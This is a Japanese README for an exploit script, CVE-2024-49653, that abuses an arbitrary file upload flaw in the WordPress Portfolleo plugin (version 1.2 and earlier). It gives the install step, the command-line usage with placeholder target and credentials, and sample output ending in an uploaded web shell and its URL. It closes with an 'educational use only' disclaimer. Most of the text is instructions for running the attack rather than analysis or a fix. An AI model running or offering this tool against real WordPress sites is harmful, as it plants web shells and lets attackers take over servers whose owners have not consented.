
WordPress Portfolleo プラグイン <= 1.2 - 任意ファイルアップロードの脆弱性
タイトル: WordPress Portfolleo プラグイン <= 1.2 - 任意ファイルアップロードの脆弱性
説明:
James Eggers の Portfolleo portfolleo における危険なタイプのファイルの制限なしアップロードの脆弱性により、Web サーバーに Web シェルをアップロードできます。この問題は Portfolleo のバージョン n/a から 1.2 に影響します。
詳細情報:
CVSS スコア:
このスクリプトは、WordPress Portfolleo プラグイン (バージョン <= 1.2) の任意ファイルアップロードの脆弱性を悪用して Web シェルをアップロードします。
スクリプトを実行するには、以下がインストールされている必要があります:
requests ライブラリbeautifulsoup4 ライブラリ必要なライブラリは次のコマンドでインストールできます:
pip install requests beautifulsoup4
以下のオプションを指定してスクリプトを実行します:
CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of the site (e.g. http://target/wordpress)
-U, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
スクリプトが正常に実行された場合、以下の出力が表示されます:
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
このスクリプトは教育目的のみを意図しています。作者は本スクリプトの違法行為への使用を容認しません。責任を持って、明示的なテスト許可があるシステムでのみ使用してください。
作成者: Nxploited | Khaled Alenazi